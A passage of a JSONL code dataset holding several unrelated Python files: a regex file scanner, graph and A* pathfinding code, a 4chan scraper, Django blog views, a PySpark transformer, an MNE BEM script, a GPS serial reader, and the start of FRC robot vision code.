child.decode('gbk') # .decode('gbk') works around garbled Chinese output\n            continue\n        else:\n            # recurse into the subdirectory and accumulate its matches\n            count += eachFile(line, child)\n    return count\n\n# Scan a single file; return 1 if it contains the pattern, else 0\ndef readFile(filenames,line):\n    fopen = open(filenames, 'r') # 'r' means read\n    fileread = fopen.read()\n    t = re.search(r'%s' %line, fileread)\n    fopen.close()\n    if t:\n        #arr.append(filenames)\n        return 1\n    return 0\n\n\n    #reg = r'.*?(welfare\\.redpacket\\.rabbitmq\\.queueName).*?'\n    #key = re.compile(reg,re.S)\n    #keylist = key.findall(fileread)\n    #if keylist is not None:\n        #return 
len(keylist)\n\ndef countNum(line,filepath):\n try:\n count = eachFile(line,filepath)\n print(line)\n print(count)\n except Exception as e:\n logging.exception(e)\n\nif __name__ == \"__main__\":\n filepath = '/Users/lichuang.lc/Documents/git/ops-activity/mainVenue/server/src/main/java'\n f = open(\"./source.txt\")\n line = f.readline()\n\n while line:\n _thread.start_new_thread(countNum, (line,filepath))\n print(\"Thread-\" + str(line) + \"start\")\n line = f.readline()\n f.close()\n\n while 1:\n pass","sub_path":"文本处理/代码扫描/scanMany.py","file_name":"scanMany.py","file_ext":"py","file_size_in_byte":1700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"313068454","text":"from collections import defaultdict, deque\n\n\nclass Solution:\n # BFS\n def alienOrder(self, words: List[str]) -> str:\n counter, graph = {}, {}\n for word in words:\n for c in word:\n counter[c] = 0\n graph[c] = set()\n for i in range(1, len(words)):\n prev, curr = words[i - 1], words[i]\n l = min(len(prev), len(curr))\n for j in range(l):\n if prev[j] != curr[j]:\n if curr[j] not in graph[prev[j]]:\n graph[prev[j]].add(curr[j])\n counter[curr[j]] += 1\n break\n q = deque()\n for k, v in counter.items():\n if v == 0:\n q.append(k)\n result = ''\n while q:\n curr = q.popleft()\n result += curr\n for child in graph[curr]:\n counter[child] -= 1\n if counter[child] == 0:\n q.append(child)\n return result if len(result) == len(graph.keys()) else ''\n\n # # DFS\n # def alienOrder(self, words: List[str]) -> str:\n # visited, graph = {}, {}\n # for word in words:\n # for c in word:\n # graph[c] = set()\n # visited[c] = 0\n # for i in range(1, len(words)):\n # prev, curr = words[i-1], words[i]\n # l = min(len(prev), len(curr))\n # for j in range(l):\n # if prev[j] != curr[j]:\n # graph[prev[j]].add(curr[j])\n # break\n # result = []\n # for k in graph.keys():\n # if not self.dfs(k, visited, graph, result):\n # return ''\n # return ''.join(result)\n\n # def dfs(self, c, visited, graph, result):\n # if visited[c] == 1: return True\n # if visited[c] == -1: return False\n # visited[c] = -1\n # for child in graph[c]:\n # if not self.dfs(child, visited, graph, result):\n # return False\n # visited[c] = 1\n # result.insert(0, c)\n # return True","sub_path":"269.py","file_name":"269.py","file_ext":"py","file_size_in_byte":2348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"579108561","text":"from utils import *\nimport numpy as np\nimport pandas as pd\nimport basc_py4chan as bp4\nfrom collections import defaultdict\nfrom os import path\nfrom bs4 import BeautifulSoup as Soup\n\nstart = start_timer()\nrelPath = r'data\\\\'\n\ndef boardToCSV(boardStr):\n boardTag = '/' + boardStr + '/'\n print('Processing Board: ' + boardTag)\n board = bp4.Board(boardStr)\n threads = board.get_all_threads()\n dictDF = defaultdict(list)\n for thread in threads:\n for post in thread.posts:\n dictDF['Board'].append(boardTag)\n dictDF['Post ID'].append(post.post_id)\n dictDF['Subject'].append(post.subject)\n dictDF['Comment'].append(post.comment)\n dictDF['Image URL'].append(post.file1.file_url if post.has_file else None)\n df = pd.DataFrame(data = dictDF)\n df.to_csv(os.path.join(relPath, boardStr + '.csv'))\n print('Wrote Data Frame to ' + boardStr + '.csv')\n print(df)\n print('Done with: ' + boardTag)\n return df\n\ndef processBoards(boardsList):\n dfList = []\n for board in boardsList:\n dfList.append(boardToCSV(board))\n dfBoards = 
pd.concat(dfList)\n    dfBoards.to_csv(os.path.join(relPath, '4chan.csv'))\n    print(dfBoards)\n    return dfBoards\n\ndef main():\n    df4chan = processBoards(boardsList=['pol', 'v', 'g', 'mu', 'fit', 'vg', 'r9k'])\n    print_run_data(start)\n\nif __name__ == \"__main__\":\n    main()","sub_path":"scrape_py4chan/csv4chan.py","file_name":"csv4chan.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"490164940","text":"# Create your views here.\nimport json\n\nfrom django.core import serializers\nfrom django.core.serializers import serialize\nfrom django.forms import model_to_dict\nfrom django.http import JsonResponse\n\nfrom blog_api.models import Article\n\n\n# Add a new article\ndef add_article(request):\n    if request.method == \"POST\":\n        req = json.loads(request.body)\n        print(req)\n        key_flag = req.get(\"title\") and req.get(\"content\") and len(req) == 2\n        # Check that the request body is well-formed\n        if key_flag:\n            title = req[\"title\"]\n            content = req[\"content\"]\n            # the title query returns a list\n            title_exist = Article.objects.filter(title=title)\n            # Check whether an article with the same title already exists\n            if len(title_exist) != 0:\n                return JsonResponse({\"status\": \"BS.400\", \"msg\": \"title already exists, fail to publish.\"})\n\n            '''Insert the data'''\n            add_art = Article(title=title, content=content, status=\"alive\")\n            add_art.save()\n            return JsonResponse({\"status\": \"BS.200\", \"msg\": \"publish article success.\"})\n        else:\n            return JsonResponse({\"status\": \"BS.400\", \"message\": \"please check param.\"})\n\n    # Query all articles and their status\n    if request.method == \"GET\":\n        articles = []\n        query_arts = Article.objects.all()\n        for article in query_arts:\n            articles.append(model_to_dict(article))\n        return JsonResponse({\"status\": \"BS.200\", \"all_titles\": articles, \"msg\": \"query articles success.\"})\n\n\ndef modify_article(request, art_id):\n    # Get an article by ID\n    if request.method == \"GET\":\n        article = {}\n        query_art = Article.objects.get(id=art_id)\n        # model_to_dict converts a model instance to a dict\n        return JsonResponse({\"status\": \"BS.200\", \"single title\": model_to_dict(query_art), \"msg\": \"query article success by id\"})\n    # Modify an article\n    if request.method == \"PUT\":\n        req = json.loads(request.body)\n        try:\n            art = Article.objects.get(id=art_id)\n            key_flag = req.get(\"title\") and req.get(\"content\") and len(req) == 2\n            if key_flag:\n                title = req[\"title\"]\n                content = req[\"content\"]\n                title_exist = Article.objects.filter(title=title)\n                if len(title_exist) > 1:\n                    return JsonResponse({\"status\": \"BS.400\", \"msg\": \"title already exists.\"})\n                '''Update the data'''\n                old_art = Article.objects.get(id=art_id)\n                old_art.title = title\n                old_art.content = content\n                old_art.save()\n                return JsonResponse({\"status\": \"BS.200\", \"msg\": \"modify article success.\"})\n        except Article.DoesNotExist:\n            return JsonResponse({\"status\": \"BS.300\", \"msg\": \"article does not exist, fail to modify.\"})\n\n    # Delete an article\n    if request.method == \"DELETE\":\n        try:\n            art = Article.objects.get(id=art_id)\n            art_id = art.id\n            art.delete()\n            return JsonResponse({\"status\": \"BS.200\", \"msg\": \"delete article success.\"})\n        except Article.DoesNotExist:\n            return JsonResponse({\"status\": \"BS.300\", \"msg\": \"article does not exist, fail to delete.\"})\n","sub_path":"blog_api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"42069396","text":"from pyspark import keyword_only \nfrom pyspark.ml import Transformer\nfrom pyspark.ml.param.shared 
import HasInputCol, HasOutputCol\nfrom pyspark.sql.functions import udf\nfrom pyspark.sql.types import StringType\n\nMAX_X1 = 663\nMAX_Y1 = 1112\nMAX_X2 = 743\nMAX_Y2 = 1192\nMEAN_X1 = 113\nMEAN_Y1 = 196\nMEAN_X2 = 134\nMEAN_Y2 = 218\nFAIXA_X1 = 200\nFAIXA_Y1 = 200\nFAIXA_X2 = 200\nFAIXA_Y2 = 200\n\nclass FillerColumnTransformer(Transformer, HasInputCol, HasOutputCol):\n\n @keyword_only\n def __init__(self, inputCol=None, outputCol=None):\n super(FillerColumnTransformer, self).__init__()\n kwargs = self._input_kwargs\n self.setParams(**kwargs)\n\n @keyword_only\n def setParams(self, inputCol=None, outputCol=None, stopwords=None):\n kwargs = self._input_kwargs\n return self._set(**kwargs)\n \n @staticmethod\n def get_binary_input_x1(value):\n if(value == -1):\n value = MEAN_X1\n \n binary_input = bin(value)[2:]\n \n for i in range(len(binary_input), len(bin(MAX_X1))):\n binary_input = \"0\" + binary_input\n \n return binary_input\n \n @staticmethod\n def get_binary_input_y1(value):\n if(value == -1):\n value = MEAN_Y1\n \n binary_input = bin(value)[2:]\n \n for i in range(len(binary_input), len(bin(MAX_Y1))):\n binary_input = \"0\" + binary_input\n \n return binary_input\n \n @staticmethod\n def get_binary_input_x2(value):\n if(value == -1):\n value = MEAN_X2\n \n binary_input = bin(value)[2:]\n \n for i in range(len(binary_input), len(bin(MAX_X2))):\n binary_input = \"0\" + binary_input\n \n return binary_input\n \n @staticmethod\n def get_binary_input_y2(value):\n if(value == -1):\n value = MEAN_Y2\n \n binary_input = bin(value)[2:]\n \n for i in range(len(binary_input), len(bin(MAX_Y2))):\n binary_input = \"0\" + binary_input\n \n return binary_input\n \n @staticmethod\n def get_binary_input_x1_thermometer(value):\n if(value == -1):\n value = MEAN_X1\n \n binary_input = bin(value)[2:]\n \n for i in range(len(binary_input), len(bin(MAX_X1/FAIXA_X1))):\n binary_input = \"0\" + binary_input\n \n return binary_input\n \n @staticmethod\n def get_binary_input_y1_thermometer(value):\n if(value == -1):\n value = MEAN_Y1\n \n binary_input = bin(value)[2:]\n \n for i in range(len(binary_input), len(bin(MAX_Y1/FAIXA_Y1))):\n binary_input = \"0\" + binary_input\n \n return binary_input\n \n @staticmethod\n def get_binary_input_x2_thermometer(value):\n if(value == -1):\n value = MEAN_X2\n \n binary_input = bin(value)[2:]\n \n for i in range(len(binary_input), len(bin(MAX_X2/FAIXA_X2))):\n binary_input = \"0\" + binary_input\n \n return binary_input\n \n @staticmethod\n def get_binary_input_y2_thermometer(value):\n if(value == -1):\n value = MEAN_Y2\n \n binary_input = bin(value)[2:]\n \n for i in range(len(binary_input), len(bin(MAX_Y2/FAIXA_Y2))):\n binary_input = \"0\" + binary_input\n \n return binary_input\n \n @staticmethod\n def get_concat_column(x1, y1, x2, y2):\n return x1 + y1 + x2 + y2\n \n @staticmethod\n def get_sum_column(x1, y1, x2, y2):\n return str(x1 + y1) + str(x2 + y2)\n \n def _transform(self, dataset):\n return dataset\n \n def _transform_x1(self, dataset):\n f = udf(self.get_binary_input_x1, StringType())\n \n return dataset.withColumn('integralX1', f(dataset['x1']))\n \n def _transform_y1(self, dataset):\n f = udf(self.get_binary_input_y1, StringType())\n \n return dataset.withColumn(\"integralY1\", f(dataset[\"y1\"]))\n \n def _transform_x2(self, dataset):\n f = udf(self.get_binary_input_x2, StringType())\n \n return dataset.withColumn(\"integralX2\", f(dataset[\"x2\"]))\n \n def _transform_y2(self, dataset):\n f = udf(self.get_binary_input_y2, StringType())\n \n return 
dataset.withColumn(\"integralY2\", f(dataset[\"y2\"]))\n \n def _transform_x1_thermometer(self, dataset):\n f = udf(self.get_binary_input_x1_thermometer, StringType())\n \n return dataset.withColumn('integralX1', f(dataset['x1']))\n \n def _transform_y1_thermometer(self, dataset):\n f = udf(self.get_binary_input_y1_thermometer, StringType())\n \n return dataset.withColumn(\"integralY1\", f(dataset[\"y1\"]))\n \n def _transform_x2_thermometer(self, dataset):\n f = udf(self.get_binary_input_x2_thermometer, StringType())\n \n return dataset.withColumn(\"integralX2\", f(dataset[\"x2\"]))\n \n def _transform_y2_thermometer(self, dataset):\n f = udf(self.get_binary_input_y2_thermometer, StringType())\n \n return dataset.withColumn(\"integralY2\", f(dataset[\"y2\"]))\n \n #concatena as entradas\n def _transform_2(self, dataset):\n f = udf(self.get_concat_column, StringType())\n \n return dataset.withColumn(\"features\", f(dataset[\"integralX1\"], dataset[\"integralY1\"], dataset[\"integralX2\"], dataset[\"integralY2\"]))\n \n #concatena as entradas somando\n def _transform_3(self, dataset):\n f = udf(self.get_sum_column, StringType())\n \n return dataset.withColumn(\"input\", f(dataset[\"x1\"], dataset[\"y1\"], dataset[\"x2\"], dataset[\"y2\"]))","sub_path":"filler_column_transformer.py","file_name":"filler_column_transformer.py","file_ext":"py","file_size_in_byte":5798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"547976260","text":"import sys\nimport stack\nimport myQueue\nclass Graph:\n\n\tdef __init__(self, numVariables):\n\t\tself.mNumVariables = int(numVariables)\n\t\tself.mNeighbors = [list() for x in range(self.mNumVariables)]\n\tdef addEdge(self,v0,v1):\n\t\tself.mNeighbors[v0].append(v1)\n\tdef depthFirstSearch(self,v0,v1):\n\t\tvisited = []\n\t\tstack1 = stack.Stack()\n\t\tstack1.push(v0)\n\t\tvisited.append(v0)\n\t\twhile stack1.top() != v1:\n\t\t\tif stack1.empty() == True:\n\t\t\t\treturn None\n\t\t\tneighbors = self.getNeighbors(stack1.top())\n\t\t\tpossible_visit = []\n\t\t\tcan_visit = False\n\t\t\tfor x in neighbors:\n\t\t\t\tif x not in visited:\n\t\t\t\t\tpossible_visit.append(x)\n\t\t\t\t\tcan_visit = True\n\t\t\tif can_visit == False:\n\t\t\t\tstack1.pop()\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tnext_visit = min(possible_visit)\n\t\t\t\tstack1.push(next_visit)\n\t\t\t\tvisited.append(next_visit)\n\t\tpath = []\n\t\twhile stack1.empty() == False:\n\t\t\tpath.append(stack1.pop())\n\t\tpath.reverse()\n\t\treturn path\n\tdef breadthFirstSearch(self, v0,v1):\n\t\tprevious = [-1] * self.mNumVariables\n\t\tq = myQueue.Queue()\n\t\tq.enqueue(v0)\n\t\tprevious[v0] = v0\n\t\tpath = []\n\t\twhile q.empty() == False:\n\t\t\tcurrent = q.dequeue()\n\t\t\t# if current is destination that we want, we want to reconstruct the path and return it, and brake the loop\n\t\t\tif current == v1:\n\t\t\t\tcurrent_path = v1\n\t\t\t\tnext_path = v1\n\t\t\t\tcount = 0\n\t\t\t\tpath.append(current_path)\n\t\t\t\tnext_path = previous[path[count]]\n\t\t\t\twhile current_path != next_path:\n\t\t\t\t\tpath.append(next_path)\n\t\t\t\t\tcurrent_path = next_path\n\t\t\t\t\tnext_path = previous[path[count + 1]]\n\t\t\t\t\tcount += 1\n\t\t\t\tpath.reverse()\n\t\t\t\treturn path\n\t\t\tneighbors = self.getNeighbors(current)\n\t\t\tneighbors.sort()\n\t\t\tfor x in neighbors:\n\t\t\t\tif previous[x] == -1:\n\t\t\t\t\tq.enqueue(x)\n\t\t\t\t\tprevious[x] = current\n\t\treturn None\n\tdef getNeighbors(self,v):\n\t\treturn self.mNeighbors[v]\n\tdef 
getEdges(self):\n\t\treturn self.mNeighbors\n\tdef isEdge(self,v0,v1):\n\t\tfor x in self.mNeighbors[v0]:\n\t\t\tif x == v1:\n\t\t\t\treturn True\n\t\t\telse:\n\t\t\t\treturn False\n\ndef main():\n\twith open(sys.argv[1], 'r') as file:\n\t\tcount = 0\n\t\tnumEdges = 0\n\t\tfor line in file:\n\t\t\tif count == 0:\n\t\t\t\tnumVertices = int(line.strip())\n\t\t\t\tgraph = Graph(numVertices)\n\t\t\t\tcount += 1\n\t\t\t\tcontinue\n\t\t\tif count == 1:\n\t\t\t\tnumEdges = int(line.strip())\n\t\t\t\tcount += 1\n\t\t\t\tcontinue\n\t\t\tif count >= 2 and count < (2 + numEdges):\n\t\t\t\tdata = line.split()\n\t\t\t\tgraph.addEdge(int(data[0]), int(data[1]))\n\t\t\t\tcount += 1\n\t\t\t\tcontinue\n\t\t\tif count == (2 + numEdges):\n\t\t\t\tnumTest = int(line.strip())\n\t\t\t\tcount +=1\n\t\t\t\tcontinue\n\t\t\tif count > (2 + numEdges):\n\t\t\t\ttest = line.split()\n\t\t\t\tprint(\"Running breadthFirst Search\")\n\t\t\t\tpath = graph.breadthFirstSearch(int(test[0]), int(test[1]))\n\t\t\t\tprint(path)\n\t\t\t\tprint(\"Running depthFirst Search\")\n\t\t\t\tpath = graph.depthFirstSearch(int(test[0]), int(test[1]))\n\t\t\t\tprint(path)\n\t\t\t\tcount +=1\n\t\t\t\tcontinue\n\nif __name__ == \"__main__\":\n\tmain()","sub_path":"Assignment-10/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":2803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"540723050","text":"from lib.vec2d import Vec2d\nfrom collections import defaultdict\nfrom lib.ecs.component.shape import ShapeComponent\nfrom lib.geometry.util import (\n distance_between,\n intersect_polygons,\n)\n\nclass AStarPlanner(object):\n def __init__(self):\n self.polygons = []\n self.nodes = []\n self.neighbors = defaultdict(list)\n\n def add_polygon(self, polygon):\n self.polygons.append(polygon)\n self.nodes.extend(polygon.get_points())\n\n def add_polygons(self, polygons):\n for polygon in polygons:\n self.add_polygon(polygon)\n\n def register_obstacle(self, entity, agent):\n shape_component = entity[ShapeComponent]\n self.add_polygon(shape_component.compute_c_polygon(agent))\n\n def init(self):\n self.compute_neighbours()\n\n # TODO: optimize this (spatial partitioning?)\n def compute_neighbours(self):\n for node_a in self.nodes:\n for node_b in self.nodes:\n if node_a == node_b:\n continue\n\n node_within_polygon = False\n for polygon in self.polygons:\n if polygon.contains_point(node_a) or polygon.contains_point(node_b):\n node_within_polygon = True\n\n if node_within_polygon:\n continue\n\n if not intersect_polygons([node_a, node_b], self.polygons):\n self.neighbors[node_a].append(node_b)\n\n def init_start_goal(self, start_node, goal_node):\n self.clean_start_node = True\n self.clean_goal_node = True\n\n for start_goal_node in [start_node, goal_node]:\n for node in self.nodes:\n if start_goal_node == node:\n if start_goal_node == start_node:\n self.clean_start_node = False\n elif start_goal_node == goal_node:\n self.clean_goal_node = False\n elif not intersect_polygons([start_goal_node, node], self.polygons):\n if node not in self.neighbors[start_goal_node]:\n self.neighbors[start_goal_node].append(node)\n\n if start_goal_node not in self.neighbors[node]:\n self.neighbors[node].append(start_goal_node)\n\n def cleanup_start_goal(self, start_node, goal_node):\n if self.clean_start_node:\n self.remove_node(start_node)\n\n if self.clean_goal_node:\n self.remove_node(goal_node)\n\n def remove_node(self, r_node):\n try:\n self.nodes.remove(r_node)\n except ValueError:\n pass\n\n 
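        # The node may appear both as a key in the adjacency map and as a value in\n        # other nodes' neighbor lists; both references are scrubbed below.\n        # (Editor's note: pop(r_node, None) would also tolerate nodes that were never registered.)\n        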
self.neighbors.pop(r_node)\n\n for node, neighbors in self.neighbors.iteritems():\n try:\n neighbors.remove(r_node)\n except ValueError:\n pass\n\n def draw_neighbors(self, renderer, color=(0, 0, 0)):\n for node, neighbors in self.neighbors.iteritems():\n for neighbor in neighbors:\n renderer.draw_lines([node, neighbor], color)\n\n def find_path(self, x1, y1, x2, y2):\n start_node = Vec2d(x1, y1)\n goal_node = Vec2d(x2, y2)\n\n if not intersect_polygons([start_node, goal_node], self.polygons):\n return [goal_node]\n\n for polygon in self.polygons:\n if polygon.contains_point(Vec2d(x2, y2)):\n return None\n\n self.init_start_goal(start_node, goal_node)\n\n closed_set = set()\n open_set = set([start_node])\n\n path_map = {}\n gx_map = { start_node: 0 }\n hx_map = {}\n\n while len(open_set) > 0:\n current_node = min(open_set, key=lambda node:gx_map[node] + hx_map.setdefault(node, distance_between(node, goal_node)))\n if current_node == goal_node:\n break\n\n open_set.remove(current_node)\n closed_set.add(current_node)\n\n neighbors = self.neighbors[current_node]\n\n for neighbor in neighbors:\n if neighbor in closed_set:\n continue\n\n gx = distance_between(neighbor, current_node) + gx_map[current_node]\n hx = hx_map.setdefault(neighbor, distance_between(neighbor, goal_node))\n\n if neighbor in open_set:\n if gx < gx_map[neighbor]:\n gx_map[neighbor] = gx\n path_map[neighbor] = current_node\n else:\n gx_map[neighbor] = gx\n path_map[neighbor] = current_node\n open_set.add(neighbor)\n\n\n if current_node != goal_node:\n return None\n\n path = []\n path_node = goal_node\n while path_node is not None:\n path.append(path_node.copy())\n path_node = path_map.get(path_node)\n\n # Remove the starting node\n path.pop()\n path.reverse()\n\n self.cleanup_start_goal(start_node, goal_node)\n \n return path\n","sub_path":"lib/pathfinding/astar/astarplanner.py","file_name":"astarplanner.py","file_ext":"py","file_size_in_byte":5001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"562871343","text":"\"\"\"\n===================\nCreate BEM surfaces\n===================\n\nExtract the BEM surfaces using the watershed algorithm. This is required to\nproduce the forward solution in the next step.\n\"\"\"\n\nimport logging\nfrom pathlib import Path\n\nimport mne\nfrom mne.parallel import parallel_func\n\nimport config\nfrom config import gen_log_message, on_error, failsafe_run\n\nlogger = logging.getLogger('mne-bids-pipeline')\n\n\n@failsafe_run(on_error=on_error)\ndef make_bem(subject):\n fs_subject = config.get_fs_subject(subject)\n fs_subjects_dir = config.get_fs_subjects_dir()\n mri_dir = Path(fs_subjects_dir) / fs_subject / 'mri'\n bem_dir = Path(fs_subjects_dir) / fs_subject / 'bem'\n watershed_bem_dir = bem_dir / 'watershed'\n flash_bem_dir = bem_dir / 'flash'\n flash_dir = mri_dir / 'flash' / 'parameter_maps'\n show = True if config.interactive else False\n\n if config.bem_mri_images == 'FLASH' and not flash_dir.exists():\n raise RuntimeError('Cannot locate FLASH MRI images.')\n elif config.bem_mri_images == 'FLASH':\n mri_images = 'FLASH'\n elif config.bem_mri_images == 'auto' and flash_dir.exists():\n mri_images = 'FLASH'\n else:\n mri_images = 'T1'\n\n if ((mri_images == 'FLASH' and flash_bem_dir.exists()) or\n (mri_images == 'T1' and watershed_bem_dir.exists())):\n msg = 'Found existing BEM surfaces. 
'\n        if config.recreate_bem:\n            msg += 'Overwriting as requested in configuration.'\n            logger.info(gen_log_message(step=10, message=msg))\n        else:\n            msg = 'Skipping surface extraction as requested in configuration.'\n            logger.info(gen_log_message(step=10, message=msg))\n            return\n\n    if mri_images == 'FLASH':\n        msg = 'Creating BEM surfaces from FLASH MRI images'\n        bem_func = mne.bem.make_flash_bem\n    else:\n        msg = ('Creating BEM surfaces from T1-weighted MRI images using '\n               'watershed algorithm')\n        bem_func = mne.bem.make_watershed_bem\n\n    logger.info(gen_log_message(step=10, message=msg))\n    bem_func(subject=fs_subject,\n             subjects_dir=fs_subjects_dir,\n             copy=True,\n             overwrite=True,\n             show=show)\n\n\ndef main():\n    \"\"\"Run BEM surface extraction.\"\"\"\n    msg = 'Running Step 10: Create BEM surfaces'\n    logger.info(gen_log_message(step=10, message=msg))\n\n    if not config.run_source_estimation:\n        msg = '    … skipping: run_source_estimation is set to False.'\n        logger.info(gen_log_message(step=10, message=msg))\n        return\n\n    parallel, run_func, _ = parallel_func(make_bem, n_jobs=config.N_JOBS)\n    parallel(run_func(subject) for subject in config.get_subjects())\n\n    msg = 'Completed Step 10: Create BEM surfaces'\n    logger.info(gen_log_message(step=10, message=msg))\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"scripts/source/01-make_bem_surfaces.py","file_name":"01-make_bem_surfaces.py","file_ext":"py","file_size_in_byte":2852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"84747611","text":"\nimport serial\nimport datetime\nfrom mintsXU4 import mintsSensorReader as mSR\nfrom mintsXU4 import mintsDefinitions as mD\nimport time\nimport pynmea2\nfrom collections import OrderedDict\nimport os\n\ndataFolder = mD.dataFolder\n# duePort = mD.duePort\ngpsPort = mD.gpsPort\n\nbaudRate = 9600\n\n\n\n\ndef main():\n\n    reader = pynmea2.NMEAStreamReader()\n    ser = serial.Serial(\n        port= gpsPort,\\\n        baudrate=baudRate,\\\n        parity =serial.PARITY_NONE,\\\n        stopbits=serial.STOPBITS_ONE,\\\n        bytesize=serial.EIGHTBITS,\\\n        timeout=0)\n\n    lastGPRMC = time.time()\n    lastGPGGA = time.time()\n    delta = 2\n    print(\"connected to: \" + ser.portstr)\n\n    #this will store the line\n    line = []\n    while True:\n        try:\n            for c in ser.read():\n                line.append(chr(c))\n                if chr(c) == '\\n':\n                    dataString = (''.join(line))\n                    dateTime = datetime.datetime.now()\n                    if (dataString.startswith(\"$GPGGA\") and mSR.getDeltaTime(lastGPGGA,delta)):\n                        mSR.GPSGPGGA2Write(dataString,dateTime)\n                        lastGPGGA = time.time()\n                    if (dataString.startswith(\"$GPRMC\") and mSR.getDeltaTime(lastGPRMC,delta)):\n                        mSR.GPSGPRMC2Write(dataString,dateTime)\n                        lastGPRMC = time.time()\n                    line = []\n                    break\n        except:\n            print(\"Incomplete String Read\")\n            line = []\n\n    ser.close()\n\n\n\nif __name__ == \"__main__\":\n    print(\"=============\")\n    print(\"    MINTS    \")\n    print(\"=============\")\n    os.system(\"sudo chmod a+rw \" + gpsPort)\n    print(\"Monitoring GPS sensor on port: {0}\".format(gpsPort)+ \" with baudrate \" + str(baudRate))\n    main()\n","sub_path":"scripts/GPSReader.py","file_name":"GPSReader.py","file_ext":"py","file_size_in_byte":1772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"428707943","text":"#----------------------------------------------------------------------------------------------#\n#                               North Canton Hoover High School                                 #\n#                                                                                               #\n#                                Team 4121 - Norsemen Robotics                                  #\n#                                                                                               #\n#                           Vision & Motion Processing Code 
#\n#----------------------------------------------------------------------------------------------#\n# #\n# This code continuously analyzes images from one or more USB cameras to identify on field #\n# game pieces and vision targets. For game pieces, the code will identify all game pieces #\n# within the camera's field of view and determine the closest one. The distance and angle #\n# to the closest game piece is calculated and made available to the main robot code through #\n# network tables. The closest game piece is highlighted with a green box while all other #\n# found game pieces are highlighted with a red box. The annotated video is streamed to the #\n# driver station for display. The annotated video is also saved to a file for post game #\n# review and analysis. For vision targets, the code will identify all vision targets and #\n# calculate the angle and distance to each one. Vision target information is made available #\n# to the main robot code through network tables. #\n# #\n# This code also continuously interrogates a VMX-Pi board to determine linear and angular #\n# motion in all three axes. This information is made available to the main robot code #\n# through network tables. #\n# #\n#----------------------------------------------------------------------------------------------#\n# #\n# Authors: Jonas Muhlenkamp #\n# Ricky Park #\n# Tresor Nshimiye #\n# Tim Fuller #\n# #\n# Creation Date: 3/1/2018 #\n# #\n# Revision: 3.0 #\n# #\n# Revision Date: 2/18/2019 #\n# #\n#----------------------------------------------------------------------------------------------#\n\n#!/usr/bin/env python3\n\n#System imports\nimport sys\nimport imp\n\n#Setup paths\nsys.path.append('/home/pi/.local/lib/python3.5/site-packages')\nsys.path.append('/usr/local/lib/vmxpi/')\n\n#Module imports\nimport cv2 as cv\nimport numpy as np\nimport datetime\nimport time\nimport logging\nimport argparse\nfrom operator import itemgetter\nimport math\nimport cscore as cs\nfrom cscore import CameraServer\nfrom networktables import NetworkTables\nfrom time import sleep\n\n#Set up basic logging\nlogging.basicConfig(level=logging.DEBUG)\n\n#Initialize operating constants\nimgWidthVision = 320 \nimgHeightVision = 240\nimgWidthDriver = 160\nimgHeightDriver = 120\ncameraFieldOfView = 27.3\n\n#Define program control flags\nwriteVideo = True\nsendVisionToDashboard = False\n\n#Define image processing method\ndef process_image(imgRaw, hsvMin, hsvMax):\n \n #Blur image to remove noise\n blur = cv.GaussianBlur(imgRaw.copy(),(7,7),0)\n \n #Convert from BGR to HSV colorspace\n hsv = cv.cvtColor(blur, cv.COLOR_BGR2HSV)\n\n #Set pixels to white if in target\n #HSV range, else set to black\n mask = cv.inRange(hsv, hsvMin, hsvMax)\n mask = cv.erode(mask, None, iterations=2)\n mask = cv.dilate(mask, None, iterations=2)\n\n #Find contours in mask\n _, contours, _ = cv.findContours(mask,cv.RETR_EXTERNAL,cv.CHAIN_APPROX_SIMPLE)\n\n return contours\n\n\n#Define processing class\ndef detect_ball_target(imgRaw):\n\n #Define constraints for ball detection\n ballRadius = 6.5 #in inches\n minRadius = 50 #in pixels, this can be tweaked as needed\n\n #Define the lower and upper boundaries of the \"green\"\n #ball in the HSV color space\n ballHSVMin = (0, 174, 0)\n ballHSVMax = (10, 255, 255)\n \n #Values to be returned\n targetRadius = 0 #px\n targetX = -1 #px\n targetY = -1 #px\n distanceToBall = -1 #inches\n angleToBall = -1000 #degrees\n ballOffset = -1000\n screenPercent = -1\n foundBall = False;\n\n #Find contours in the mask and clean up the 
return style from OpenCV\n ballContours = process_image(imgRaw, ballHSVMin, ballHSVMax)\n\n if len(ballContours) == 2:\n ballContours = ballContours[0]\n elif len(ballContours) == 3:\n ballContours = ballContours[1]\n\n #Only proceed if at least one contour was found\n if len(ballContours) > 0:\n \n largestContour = max(ballContours, key=cv.contourArea)\n ((x, y), radius) = cv.minEnclosingCircle(largestContour)\n\n if radius > minRadius:\n\n targetRadius = radius\n targetX = x\n targetY = y\n foundBall = True\n\n #Distance and angle offset calculations\n if targetRadius > 0:\n \n inches_per_pixel = ballRadius/targetRadius #set up a general conversion factor\n distanceToBall = inches_per_pixel * (imgWidthVision / (2 * math.tan(math.radians(cameraFieldOfView))))\n offsetInInches = inches_per_pixel * (targetX - imgWidthVision / 2)\n angleToBall = math.degrees(math.atan((offsetInInches / distanceToBall)))\n screenPercent = cv.contourArea(largestContour) / (imgWidthVision * imgHeightVision)\n ballOffset = imgWidthVision/2 - targetX\n \n else:\n \n distanceToBall = -1\n angleToBall = float('nan')\n\n return targetX, targetY, targetRadius, distanceToBall, angleToBall, ballOffset, screenPercent, foundBall\n\n \n#Define floor alignment tape detection method\ndef detect_floor_tape(imgRaw):\n \n #Define constraints for detecting floor tape\n floorTapeWidth = 2.0 #in inches\n floorTapeLength = 18.0 #in inches\n minTapeArea = 100 #in square px, can be tweaked if needed\n\n #Define HSV range for white alignment tape\n tapeHSVMin = (0, 0, 